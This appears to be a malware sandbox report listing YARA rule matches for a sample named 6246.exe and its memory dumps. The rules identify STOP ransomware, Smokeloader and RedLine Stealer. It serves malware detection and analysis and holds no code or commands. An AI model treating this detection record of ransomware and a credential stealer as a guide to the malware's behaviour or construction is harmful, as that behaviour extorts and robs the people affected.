Source: 8.0.6246.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.6246.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.6246.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.6246.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 8.0.6246.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.6246.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.6246.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 8.0.6246.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.6246.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.6246.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 8.2.6246.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.6246.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.6246.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 8.0.6246.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.6246.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.6246.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 4.2.6246.exe.22615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 4.2.6246.exe.22615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 4.2.6246.exe.22615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.6246.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 8.0.6246.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.6246.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.6246.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 8.0.6246.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.6246.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.6246.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 8.0.6246.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.6246.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.6246.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 8.0.6246.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.6246.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.6246.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 8.0.6246.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.6246.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 4.2.6246.exe.22615a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 4.2.6246.exe.22615a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 4.2.6246.exe.22615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.6246.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 8.2.6246.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.6246.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.6246.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 8.0.6246.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.6246.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000002.574920168.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000009.00000000.491916459.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.517310992.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000007.00000000.492089857.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.505319031.0000000000841000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000008.00000000.496174295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000007.00000002.531881974.0000000000921000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000009.00000000.499526693.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.533353582.0000000000926000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000002.572802544.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.503555817.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.431462831.00000000008C1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000009.00000002.533230788.0000000000661000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.572996801.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000009.00000002.532778418.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.426191617.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.500012370.0000000000661000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.575526582.0000000000851000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000007.00000002.531437946.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000E.00000000.490370694.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
